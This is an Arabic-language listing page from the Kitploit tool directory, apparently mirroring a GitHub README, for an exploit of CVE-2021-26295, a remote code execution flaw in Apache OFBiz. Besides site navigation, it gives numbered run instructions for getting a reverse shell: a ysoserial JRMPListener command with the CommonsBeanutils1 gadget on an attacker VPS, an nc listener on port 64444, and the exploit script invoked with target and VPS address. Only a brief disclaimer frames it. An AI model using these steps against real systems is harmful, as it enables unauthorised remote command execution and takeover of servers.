Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-26295 — استغلال لـ CVE-2021-26295 (Apache OFBiz RCE) باستخدام مستمع ysoserial JRMP لتنفيذ الأوامر والحصول على قشرة عكسية على الأهداف الضعيفة. | Kitploit
أدوات/GitHubGitHub/dskho/cve-2021-26295
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubdskho/cve-2021-26295

CVE-2021-26295

استغلال لـ CVE-2021-26295 (Apache OFBiz RCE) باستخدام مستمع ysoserial JRMP لتنفيذ الأوامر والحصول على قشرة عكسية على الأهداف الضعيفة.

عرض المستودع
1010منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-26295

يمكن لـ CVE-2021-26295 EXP الحصول على شل عكسي بنجاح

هذه المقالة والأدوات مخصصة للمشاركة التقنية فقط، ويُحظر استخدامها لأغراض غير قانونية. وإلا، يتحمل المستخدم المسؤولية الكاملة عن أي عواقب.

تشغيل أمر تنفيذ EXP

1. بدء الاستماع لـ RMI على المنفذ 9999 على VPS

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[الأمر المراد تنفيذه]'

2. بدء الاستماع لـ nc على المنفذ 64444 على VPS

nc -lvp 64444

3. تشغيل سكريبت بايثون

python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

مثال

1616580076993

1616580247015

تنزيل الأداة